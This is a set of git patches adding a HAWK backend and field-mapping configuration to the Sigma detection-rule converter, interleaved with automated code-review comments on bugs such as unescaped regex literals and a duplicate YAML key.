@@ -9,7 +9,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection: Image|endswith: '\scrcons.exe' From b30abd5c1226d452bb96acaa0f8e645f097fa4f7 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Mon, 18 Oct 2021 21:34:48 +0000 Subject: [PATCH 1267/1367] updating hawk json format record --- tools/sigma/backends/hawk.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 9d0e0611..17dbc6a1 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -402,7 +402,9 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) if 'references' in sigmaparser.parsedyaml: - cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) + ref = "%s\n" % "\n".join(sigmaparser.parsedyaml['references']) + else: + ref = '' record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], 
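Review bot: `"\n".join(sigmaparser.parsedyaml['references'])` raises TypeError if a rule's `references` is a single string rather than a list, whereas the `falsepositives` handling just above this hunk checks the type explicitly; treat references the same way, e.g. `refs = sigmaparser.parsedyaml['references']` / `if isinstance(refs, str): refs = [refs]` / `ref = "%s\n" % "\n".join(refs)`. After this change the references no longer reach `cmt` at all, so the comment text shown in HAWK loses them unless the consumer reads the new `references` key that the next hunk adds — worth stating in a comment next to `ref`. The enclosing method starts above the hunk.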
@@ -412,8 +414,9 @@ class HAWKBackend(SingleTextQueryBackend):
             "enabled" : True,
             "public" : True,
             "comments" : cmt,
+            "references" : ref,
             "group_name" : ".",
-            "score_id" : sigmaparser.parsedyaml['id']
+            "hawk_id" : sigmaparser.parsedyaml['id']
         }
         if 'tags' in sigmaparser.parsedyaml:
             record["tags"] = sigmaparser.parsedyaml['tags']
From ae2923bdd8c3fadbc0b4d93ddd7c2c346b994d4e Mon Sep 17 00:00:00 2001
From: Tim Shelton
Date: Wed, 13 Oct 2021 14:36:49 +0000
Subject: [PATCH 1268/1367] Initial commmit of hawk analytic score generator

---
 tools/config/hawk.yml | 99 +++++++++
 tools/sigma/backends/hawk.py | 415 +++++++++++++++++++++++++++++++++++
 2 files changed, 514 insertions(+)
 create mode 100644 tools/config/hawk.yml
 create mode 100644 tools/sigma/backends/hawk.py

diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml
new file mode 100644
index 00000000..5caf6ede
--- /dev/null
+++ b/tools/config/hawk.yml
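Review bot: `"public" : True` stays hard-coded next to the new keys, so every converted rule is emitted as public; if that flag governs visibility in HAWK, the converter silently shares internal detection content, and it should come from a backend option defaulting to False or at least carry a comment explaining why public is the intended default. Renaming `score_id` to `hawk_id` changes the output schema, so any existing importer keyed on `score_id` breaks; if that is intended, say so in the commit message. `sigmaparser.parsedyaml['id']` also raises KeyError for a rule without an `id`, which Sigma permits; `sigmaparser.parsedyaml.get('id')` would match the `'tags'` guard just below.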
@@ -0,0 +1,99 @@
+title: HAWK
+order: 20
+backends:
+  - hawk
+fieldmappings:
+  dst:
+    - ip_dst_host
+  dst_ip:
+    - ip_dst
+  src:
+    - ip_src_host
+  src_ip:
+    - ip_src
+  category: vendor_category
+  error: error_code
+  key: event_key
+  payload: event_payload
+  weight: event_weight
+  account type: account_type
+  PrivilegeList: process_privileges
+  pid_user: event_username
+  sid: correlation_session_id
+  UserSid: correlation_session_id
+  TargetSid: target_session_id
+  TargetUserName: target_username
+  SamAccountName: target_username
+  AccountName: target_username
+  TargetDomainName: target_domain
+  DnsServerIpAddress: dns_address
+  QueryName: hostname_dst
+  AuthenticationPackageName: package_name
+  HostProcess: image
+  Application: image
+  ProcessName: image
+  TargetImage: target_image
+  Parent Image: parent_image
+  ParentImage: parent_image
+  Caller Process Name: parent_image
+  CallerProcessName: parent_image
+  ParentProcessName: parent_image
+  CommandLine: command
+  ProcessCommandLine: command
+  ParentCommandLine: parent_command
+  IMPHASH: file_hash_imphash
+  SHA256: file_hash_sha256
+  MD5: file_hash_md5
+  SHA1: file_hash_sha1
+  SubjectUserSid: correlation_session_id
+  SubjectSid: correlation_session_id
+  SubjectUserName: correlation_username
+  SubjectDomainName: correlation_domain
+  SubjectLogonId: correlation_logon_id
+  pid: event_pid
+  ProccessId: pid
+  NewProcessName: image
+  ServiceName: service_name
+  Service: service_name
+  ServiceFileName: filename
+  TargetObject: target_object
+  EventID: vendor_id
+  SourceImage: parent_image
+  Description: image_description
+  Product: image_product
+  Company: image_company
+  CurrentDirectory: path
+  ShareName: path
+  RelativeTargetName: filename
+  TargetName: value
+  Initiated: value
+  Accesses: access_mask
+  LDAPDisplayName: distinguished_name
+  AttributeLDAPDisplayName: distinguished_name
+  AttributeValue: value
+  ParentProcessId: parent_pid
+  SourceProcessId: source_pid
+  TargetProcessId: target_pid
+  Signed: signature
+  Status: value
+  TargetFilename: filename
+  TargetObject: object
+  ObjectClass: object_type
+  ObjectValueName: object_name
+  DeviceClassName: object_name
+  Details: object_target
+  CallTrace: calltrace
+  IpAddress: ip_src
+  DCIPAddress: ip_src
+  WorkstationName: hostname_src
+  Workstation: hostname_src
+  DestinationIp: ip_dst
+  DestinationHostname: hostname_dst
+  DestinationPort: ip_dport
+  GrantedAccess: access_mask
+  StartModule: target_process_name
+  TargetProcessAddress: process_address
+  TicketOptions: sys.ticket.options
+  TicketEncryptionType: sys.ticket.encryption.type
+  DetectionSource: value
+  Priority: event_priority
diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py
new file mode 100644
index 00000000..b2a775be
--- /dev/null
+++ b/tools/sigma/backends/hawk.py
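Review bot: `TargetObject` is mapped twice in `fieldmappings` (`target_object` in the middle of the list, `object` near the end); common YAML loaders keep only the last duplicate without warning, so the `target_object` mapping is dead and which name wins depends on the loader — keep a single entry, presumably `TargetObject: object` since `Details: object_target` sits beside it. `ProccessId: pid` is misspelled, so Sysmon's `ProcessId` never maps and passes through unchanged; correct it to `ProcessId: pid` and check whether the target should be `event_pid`, which is what the `pid` entry maps to. Keys such as `account type`, `Parent Image` and `Caller Process Name` contain spaces and only match rules that use those exact field names, which is worth a comment if intended.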
@@ -0,0 +1,415 @@ +# Output backends for sigmac - HAWK.io + + +import re +import sigma +import json +import uuid +from sigma.parser.modifiers.base import SigmaTypeModifier +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier +from .base import SingleTextQueryBackend +from .mixins import MultiRuleOutputMixin + + +class HAWKBackend(SingleTextQueryBackend): + """Converts Sigma rule into HAWK search""" + identifier = "hawk" + active = True + config_required = False + default_config = ["sysmon", "hawk"] + reEscape = re.compile('(")') + reClear = None + andToken = " , " + orToken = " , " + subExpression = "{\"id\": \"and\", \"key\": \"And\", \"children\": [%s] }" + listExpression = "%s" + listSeparator = " " + valueExpression = "%s" + keyExpression = "%s" + nullExpression = "%s = null" + notNullExpression = "%s != null" + mapExpression = "%s=%s" + mapListsSpecialHandling = True + aql_database = "events" + + def cleanKey(self, key): + if key == None: + return "" + return self.sigmaparser.config.get_fieldmapping(key).resolve_fieldname(key, self.sigmaparser) + + def cleanValue(self, value): + """Remove quotes in text""" + # return value.replace("\'","\\\'") + return value + + def generateNode(self, node, notNode=False): + #print(type(node)) + #print(node) + if type(node) == sigma.parser.condition.ConditionAND: + return self.generateANDNode(node) + elif type(node) == sigma.parser.condition.ConditionOR: + #print("OR NODE") + #print(node) + return self.generateORNode(node) + elif type(node) == sigma.parser.condition.ConditionNOT: + #print("NOT NODE") + #print(node) + return self.generateNOTNode(node) + elif type(node) == sigma.parser.condition.ConditionNULLValue: + return self.generateNULLValueNode(node) + elif type(node) == sigma.parser.condition.ConditionNotNULLValue: + return self.generateNotNULLValueNode(node) + elif type(node) == sigma.parser.condition.NodeSubexpression: + #print(node) + return self.generateSubexpressionNode(node) + elif type(node) == 
tuple: + return self.generateMapItemNode(node, notNode) + elif type(node) in (str, int): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } + #key = next(iter(self.sigmaparser.parsedyaml['detection'])) + key = "payload" + + #nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['key'] = key + + #print(node) + #print("KEY: ", key) + # they imply the entire payload + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + # return json.dumps(nodeRet) + return nodeRet + elif type(node) == list: + return self.generateListNode(node, notNode) + else: + raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + + def generateANDNode(self, node): + """ + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + return self.andToken.join(filtered) + else: + return None + """ + ret = { "id" : "and", "key": "And", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateORNode(self, node): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if 'len'in 
dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated + if generated: + return json.loads(self.subExpression % json.dumps(generated)) + else: + return None + + def generateListNode(self, node, notNode=False): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + result = [self.generateNode(value, notNode) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + #print("LIST EXPRESSION") + #print(result) + return self.listExpression % (self.listSeparator.join(result)) + + def generateNOTNode(self, node): + generated = self.generateNode(node.item, True) + return generated + + def generateMapItemNode(self, node, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": 5 } } } + if notNode: + nodeRet["args"]["comparison"]["value"] = "!=" + nodeRet['rule_id'] = str(uuid.uuid4()) + key, value = node + if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + if type(value) == str and "*" in value: + # value = value.replace("*", ".*") + value = value.replace("*", "") + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + nodeRet['args']['str']['value'] = value + # return "%s regex %s" % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + elif type(value) is str: + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + 
nodeRet['args']['str']['value'] = value + # return json.dumps(nodeRet) + return nodeRet + elif type(value) is int: + nodeRet['return'] = "int" + nodeRet['args']['int'] = { "value" : value } + del nodeRet['args']['str'] + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + else: + #return self.mapExpression % (self.cleanKey(key), self.generateNode(value)) + nodeRet['args']['str']['value'] = value + #return json.dumps(nodeRet) + return nodeRet + elif type(value) == list: + return self.generateMapItemListNode(key, value, notNode) + elif isinstance(value, SigmaTypeModifier): + return self.generateMapItemTypedNode(key, value) + elif value is None: + #return self.nullExpression % (key, ) + nodeRet['args']['str']['value'] = None + #return json.dumps(nodeRet) + return nodeRet + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value, notNode=False): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + for item in value: + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + if item is None: + nodeRet['args']['str']['value'] = 'null' + ret['children'].append( nodeRet ) + elif type(item) == str and "*" in item: + item = item.replace("*", "") + # item = item.replace("*", ".*") + #print("item") + #print(item) + nodeRet['args']['str']['value'] = item # self.generateValueNode(item, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + ret['children'].append( nodeRet ) + else: + #print("item2") + #print(item) + nodeRet['args']['str']['value'] = self.generateValueNode(item, True) + ret['children'].append( nodeRet ) + # 
return json.dumps(ret) # '('+" or ".join(itemslist)+')' + return ret # '('+" or ".join(itemslist)+')' + + def generateMapItemTypedNode(self, fieldname, value, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(fieldname).lower() + nodeRet['description'] = fieldname + nodeRet['rule_id'] = str(uuid.uuid4()) + if type(value) == SigmaRegularExpressionModifier: + regex = str(value) + """ + # Regular Expressions have to match the full value in QRadar + if not (regex.startswith('^') or regex.startswith('.*')): + regex = '.*' + regex + if not (regex.endswith('$') or regex.endswith('.*')): + regex = regex + '.*' + return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) + """ + #print("ENDS WITH!!!") + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + # return json.dumps(nodeRet) + return nodeRet + else: + raise NotImplementedError("Type modifier '{}' is not supported by backend".format(value.identifier)) + + def generateValueNode(self, node, keypresent): + """ + if keypresent == False: + return "payload regex \'{0}{1}{2}\'".format("%", self.cleanValue(str(node)), "%") + else: + return self.valueExpression % (self.cleanValue(str(node))) + """ + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + # node.item + nodeRet = {"key": node.item, "description": node.item, "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "null" } } } + nodeRet['rule_id'] = str(uuid.uuid4()) + # return json.dumps(nodeRet) + return nodeRet + + def generateNotNULLValueNode(self, node): + # return self.notNullExpression % (node.item) + return node.item + + def generateAggregation(self, 
agg, timeframe='00'): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) + raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) + """ + elif agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + elif agg.groupfield != None and timeframe != None: + for key, duration in self.generateTimeframe(timeframe).items(): + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + return self.prefixAgg, self.suffixAgg + else: + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + """ + #print(agg) + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") + + def generateTimeframe(self, timeframe): + time_unit = timeframe[-1:] + duration = timeframe[:-1] + timeframe_object = {} + if time_unit == "s": + timeframe_object['seconds'] = 
int(duration) + elif time_unit == "m": + timeframe_object['minutes'] = int(duration) + elif time_unit == "h": + timeframe_object['hours'] = int(duration) + elif time_unit == "d": + timeframe_object['days'] = int(duration) + else: + timeframe_object['months'] = int(duration) + return timeframe_object + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + #print(sigmaparser.parsedyaml) + #print(sigmaparser.condparsed) + for parsed in sigmaparser.condparsed: + query = self.generateQuery(parsed, sigmaparser) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def generateQuery(self, parsed, sigmaparser): + self.sigmaparser = sigmaparser + result = self.generateNode(parsed.parsedSearch) + self.parsedlogsource = sigmaparser.get_logsource().index + """ + if any("flow" in i for i in self.parsedlogsource): + aql_database = "flows" + else: + aql_database = "events" + """ + prefix = "" + ret = '[ { "id" : "and", "key": "And", "children" : [' + ret2 =" ] } ]" + """ + try: + mappedFields = [] + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + mappedFields.append(mapped) + if " " in mapped and not "(" in mapped: + prefix += ", \"" + mapped + "\"" + else: + prefix += ", " + mapped + + except KeyError: # no 'fields' attribute + mapped = None + pass + """ + + #if parsed.parsedAgg: #and timeframe == None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) + # result = prefix + result + # result += suffixAgg + #elif parsed.parsedAgg != None and timeframe != None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) + # result = prefix + result + # result += suffixAgg + #else: + # result = 
prefix + result + + #print(result) + result = prefix + json.dumps(result) + + # print(sigmaparser.parsedyaml) + + analytic_txt = ret + result + ret2 # json.dumps(ret) + try: + analytic = json.loads(analytic_txt) # json.dumps(ret) + except Exception as e: + print("Failed to parse json: %s" % analytic_txt) + raise Exception("Failed to parse json: %s" % analytic_txt) + # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + + record = { + "rules" : analytic, # analytic_txt.replace('"','""'), + "filter_name" : sigmaparser.parsedyaml['title'], + "actions_category_name" : "Add (+)", + "correlation_action" : 5.00, + "date_added" : sigmaparser.parsedyaml['date'], + "enabled" : True, + "public" : True, + "group_name" : ".", + "score_id" : sigmaparser.parsedyaml['id'] + } + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': + record['correlation_action'] += 10.0; + if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: + record['correlation_action'] -= (2.0 * len(self.sigmaparser.parsedyaml['falsepositives']) ) + + if 'level' in self.sigmaparser.parsedyaml: + if self.sigmaparser.parsedyaml['level'].lower() == 'critical': + record['correlation_action'] += 15.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'high': + record['correlation_action'] += 10.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'medium': + record['correlation_action'] += 5.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'low': + record['correlation_action'] += 2.0; + + return json.dumps(record) From f2d9cf0964dbdfba46c2cb1ff0ced73a53a57ff0 Mon Sep 17 00:00:00 2001 
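Review bot: In `generateMapItemNode`, and again in `generateMapItemListNode` and the bare-string branch of `generateNode`, a value containing `*` becomes a `regex` comparison by simply dropping the `*` (`value.replace("*", "")`), but the remaining literal is never regex-escaped; assuming HAWK's `regex` comparison uses ordinary regex syntax, rule values such as `\cmd.exe` or `(x86)` reach it with `\`, `.` and `(` carrying regex meaning, and the converted detection no longer matches what the Sigma author wrote. Escaping the literal parts and joining them with `.*` preserves wildcard semantics: `value = ".*".join(re.escape(p) for p in value.split("*"))`, applied in all three places. Separately, `generateQuery` catches `Exception`, prints the failing JSON to stdout — the stream sigmac writes its converted output to — and re-raises a bare `Exception`; `raise ValueError("Failed to parse json: %s" % analytic_txt) from e` with the diagnostic on stderr keeps the output stream clean.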
From: Tim Shelton Date: Thu, 14 Oct 2021 14:17:03 +0000 Subject: [PATCH 1269/1367] Initial commmit of hawk analytic score generator --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index b2a775be..0bfe6192 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - # print(sigmaparser.parsedyaml) + print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From 6e35c031de2fb107b13dc65022c4f52e24e8b94c Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 15:05:05 +0000 Subject: [PATCH 1270/1367] Add additional information to the analytic record, including tags, author info, rule id and references --- tools/sigma/backends/hawk.py | 23 ++++++++++++++++++++++- tools/sigma/sigmac.py | 3 ++- 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 0bfe6192..9d0e0611 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - print(sigmaparser.parsedyaml) + #print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: 
@@ -386,6 +386,23 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Failed to parse json: %s" % analytic_txt) # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + cmt = "Sigma Rule: %s\n" % sigmaparser.parsedyaml['id'] + cmt += "Author: %s\n" % sigmaparser.parsedyaml['author'] + cmt += "Level: %s\n" % sigmaparser.parsedyaml['level'] + if 'falsepositives' in sigmaparser.parsedyaml and type(sigmaparser.parsedyaml['falsepositives']) is list: + if len(sigmaparser.parsedyaml['falsepositives']) > 0: + cmt += "False Positives: " + for v in sigmaparser.parsedyaml['falsepositives']: + if v: + cmt += "%s, " % v + else: + cmt += "None, " + cmt = cmt[:-2] + "\n" + elif 'falsepositives' in sigmaparser.parsedyaml and sigmaparser.parsedyaml['falsepositives']: + raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) + + if 'references' in sigmaparser.parsedyaml: + cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -394,9 +411,13 @@ class HAWKBackend(SingleTextQueryBackend): "date_added" : sigmaparser.parsedyaml['date'], "enabled" : True, "public" : True, + "comments" : cmt, "group_name" : ".", "score_id" : sigmaparser.parsedyaml['id'] } + if 'tags' in sigmaparser.parsedyaml: + record["tags"] = sigmaparser.parsedyaml['tags'] + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 27f07a0c..6a153a6f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
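Review bot: `sigmaparser.parsedyaml['author']` and `sigmaparser.parsedyaml['level']` in the new comment block are indexed unconditionally, while `status`, `falsepositives` and `tags` are probed with `in` a few lines later; `author` and `level` are not mandatory Sigma fields, so a rule without them now aborts conversion with a `KeyError` instead of producing a record. `sigmaparser.parsedyaml.get('author', '')` and `.get('level', '')` keep the behaviour consistent with the surrounding checks. The `raise Exception("Unknown type for false positives: ", type(...))` also passes two arguments rather than one formatted message, so the error prints as a tuple; `"Unknown type for false positives: %s" % type(sigmaparser.parsedyaml['falsepositives'])` reads correctly.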
@@ -22,7 +22,7 @@ import ruamel.yaml import json import pathlib import itertools -import logging +import logging, traceback from sigma.parser.collection import SigmaCollectionParser from sigma.parser.exceptions import SigmaCollectionParseError, SigmaParseError from sigma.configuration import SigmaConfiguration, SigmaConfigurationChain @@ -368,6 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 16a78187bd67cefb76a9fc195210d2df26c0c959 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Mon, 18 Oct 2021 21:34:48 +0000 Subject: [PATCH 1271/1367] updating hawk json format record --- tools/sigma/backends/hawk.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 9d0e0611..17dbc6a1 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -402,7 +402,9 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) if 'references' in sigmaparser.parsedyaml: - cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) + ref = "%s\n" % "\n".join(sigmaparser.parsedyaml['references']) + else: + ref = '' record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -412,8 +414,9 @@ class HAWKBackend(SingleTextQueryBackend): "enabled" : True, "public" : True, "comments" : cmt, + "references" : ref, "group_name" : ".", - "score_id" : sigmaparser.parsedyaml['id'] + "hawk_id" : sigmaparser.parsedyaml['id'] } if 'tags' in sigmaparser.parsedyaml: record["tags"] = sigmaparser.parsedyaml['tags'] 
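Review bot: `traceback.print_exc()` writes the full stack trace to stderr for every unsupported-feature failure regardless of verbosity, where the surrounding code only emits a one-line message plus a `logger.debug`; `logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile), exc_info=True)` keeps the trace available under verbose logging without changing normal output. `import logging, traceback` also puts two imports on one line, against the one-import-per-line style of the rest of the import block.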
From d5498eecbf48e065ad24a461822cdb248d0b0d5f Mon Sep 17 00:00:00 2001
From: Tim Shelton
Date: Tue, 19 Oct 2021 02:35:45 +0000
Subject: [PATCH 1272/1367] updating hawk backend, still pending aggregation support
---
tools/config/hawk.yml | 116 +++++++++++++++++++++++++++++++++++
tools/sigma/backends/hawk.py | 73 +++++++++++++++++++---
2 files changed, 180 insertions(+), 9 deletions(-)
diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml
index 5caf6ede..2b1f8f6f 100644
--- a/tools/config/hawk.yml
+++ b/tools/config/hawk.yml
@@ -2,6 +2,121 @@ title: HAWK
order: 20
backends:
- hawk
+logsources:
+ apache:
+ product: apache
+ conditions:
+ product_name: '*apache*'
+ windows:
+ product: windows
+ index: windows
+ conditions:
+ vendor_name: 'Microsoft'
+ windows-application:
+ product: windows
+ service: application
+ conditions:
+ product_name: 'Application'
+ windows-security:
+ product: windows
+ service: security
+ conditions:
+ product_name: 'Security'
+ windows-system:
+ product: windows
+ service: system
+ conditions:
+ product_name: 'System'
+ windows-sysmon:
+ product: windows
+ service: sysmon
+ conditions:
+ product_name: 'Sysmon'
+ windows-powershell:
+ product: windows
+ service: powershell
+ conditions:
+ product_name: 'PowerShell'
+ windows-classicpowershell:
+ product: windows
+ service: powershell-classic
+ conditions:
+ product_name: 'Windows PowerShell'
+ windows-taskscheduler:
+ product: windows
+ service: taskscheduler
+ conditions:
+ product_name: 'TaskScheduler'
+ windows-wmi:
+ product: windows
+ service: wmi
+ conditions:
+ product_name: 'WMI-Activity'
+ windows-dns-server:
+ product: windows
+ service: dns-server
+ category: dns
+ conditions:
+ product_name: 'DNS Server'
+ windows-dns-server-audit:
+ product: windows
+ service: dns-server-audit
+ conditions:
+ product_name: 'DNS-Server'
+ windows-driver-framework:
+ product: windows
+ service: driver-framework
+ conditions:
+ product_name: 'DriverFrameworks-UserMode'
+ windows-ntlm:
+ product: windows
+ service: ntlm
+ conditions:
+ product_name: 'NTLM'
+ windows-dhcp:
+ product: windows
+ service: dhcp
+ conditions:
+ product_name: 'DHCP-Server'
+ windows-defender:
+ product: windows
+ service: windefend
+ conditions:
+ product_name: 'Windows Defender'
+ windows-applocker:
+ product: windows
+ service: applocker
+ conditions:
+ product_name:
+ - 'AppLocker'
+ windows-msexchange-management:
+ product: windows
+ service: msexchange-management
+ conditions:
+ product_name: 'MSExchange Management'
+ windows-printservice-admin:
+ product: windows
+ service: printservice-admin
+ conditions:
+ product_name: 'PrintService'
